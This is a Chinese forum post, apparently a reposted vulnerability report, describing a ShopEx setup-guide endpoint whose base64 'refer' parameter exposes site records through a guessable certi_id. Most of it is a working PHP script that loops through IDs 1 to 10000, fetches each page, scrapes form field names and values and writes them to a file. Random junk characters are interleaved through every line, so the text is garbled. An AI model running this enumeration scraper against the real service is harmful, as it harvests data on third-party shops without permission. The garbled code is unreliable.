|
|
简要描述:
# p" y+ B* h: O( NShopEx某接口缺陷,可遍历所有网站
) b+ j& P3 r- O8 ]详细说明:
: ~: R& r( D. P问题出现在shopex 网店使用向导页面 + j- A1 g/ [/ b
# A. O8 R; C B7 [0 T
$ Y2 Z' F5 h8 p, _1 B) N
# O4 d: ^4 I* P8 U" ghttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
# G6 @" J4 E, A2 m2 w
" d% p9 U8 ~/ h! R# g; y
- C, W: `7 R: N g, j4 Z, }
$ h% S; r, y/ ]+ |% p( T# H6 yrefer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}3 l* `6 F1 h, q) ~* K% X
0 g* U- {% Z( L& U
, L* S o: s; _( L' | p" g7 {$ |9 A, H+ h
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
- h" v6 b$ `0 ], K% m3 C
- q e2 X4 @- k0 {# Y
& t7 _) j1 X5 c& h4 |) `5 T+ g% A
6 [8 T2 m. l- k0 R& v<?php
6 Y# F, i. d: g* }! T6 |. f# d) W9 m% E' r. m4 x
for ($i=1; $i < 10000; $i++) { //遍历3 d+ o, V7 v3 N) u
* ~0 N v# Y- X ShowshopExD($i);
2 Y9 b: `0 a7 o o
0 o9 I" p- m# c j. X) V# H }) v7 T9 J1 r" ~$ J/ o9 U) e; x
9 A0 u1 X6 m7 i, E7 p5 _
function ShowshopExD($cid) {
5 f9 k- |6 t" j7 A
# [- ]" E9 y! [) ~/ I $url='http://guide.ecos.shopex.cn/step2.php';- L/ o# l5 X% G( v7 [6 E! C
9 T+ v4 E' w" _: G1 i
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');6 ^( n& D0 M8 u P4 p9 J* R- c
$ h$ t) S1 s; l0 R; d; [
$url = $url.'?refer='.$refer;7 o& b. E6 @, {3 C- g% X
8 A7 v3 I7 Z2 J" e/ l $ch = curl_init($url);/ K2 C1 N7 N$ D9 I1 s6 p) i
2 _% Z* ~# L% K6 \7 x; Y, }
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
: v% D! s5 R6 S: C' o
" J1 s8 R$ ~' D* {3 b curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;8 E0 n; s4 m( I8 J" M1 `4 ~( R
7 C; E1 ~- T$ x3 C4 P, w $result = curl_exec($ch); X3 w" W( i1 I" i6 N
& X4 o# V* T) Q/ n5 w* D8 W! n
$result = mb_convert_encoding($result, "gb2312", "UTF-8");
; G( L3 Q) ^ }9 d1 e4 D; W. a- ^6 w, C6 f% w+ H, ~
if(strpos($result,$refer))0 J' a/ L+ p) I0 o7 [
+ c a. S' S) G& A
{+ z7 D9 i6 \4 d
H$ ^3 G& L2 z6 J) s* q$ W $fp = fopen("c:/shopEx.txt",'ab'); //保存文件# `2 T, \' Z ]
, @9 W* s" r# Q3 m% J4 v0 E
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
0 F5 O& G1 M: l4 W- o6 d9 l# \5 ~1 a: U3 V5 N' d. ]* c) Z6 l
foreach ($value[1] as $key) {$ c$ j, h2 B7 r: R7 r: }! b3 ]
, \0 `6 J4 ?" h
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
, V1 L) N1 }+ F% ]2 J1 S
8 V; t# d5 m! s. i! [8 j, h" U0 }" p echo $res[1][0].':'.$res[3][0]."\r\n";+ T5 s. Z, q* T, T3 D
; w) M- _2 z0 E $col =$res[1][0].':'.$res[3][0]."\r\n"; ; D, ]+ \( d/ T/ c! R: L
9 ~. w2 M7 q+ k" g
fwrite($fp, $col, strlen($col)); 8 D: N f: N1 h; e
7 N% |0 F! i5 ~# X5 A
}9 ]$ F3 Z# D4 a
5 I' o; G8 D/ p. Q9 p& n# S
echo '--------------------------------'."\r\n";
+ E7 [' s* M7 u) p: b4 e" r4 W2 j$ ?, t3 T0 b* C" v2 Q
fclose($fp);
5 j/ T$ @2 j, `6 f/ \: N8 d% { Y6 I9 j8 e! R. \
}- T. w- F: \9 A( L- n
, p; b, z; d" r
flush();! {7 \5 C. q; O1 k; M
. L9 j$ s2 i* z8 M curl_close($ch);8 B$ K2 p% ]2 F3 |, n4 c
7 Z( K7 i" n# V. u7 { }' }; G6 B4 q# z" K8 I' D8 E
( @! L+ X$ _ [3 i5 |?>
2 J' n9 f K9 J漏洞证明:
2 o) R; T7 A2 H; _http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg& p* Q- w$ H/ U. {7 @2 {7 O5 p
refer换成其他加密方式) L8 i+ O! ^/ @$ j: z
|
|
发表于 2013-9-21 15:59:47
收藏
支持
反对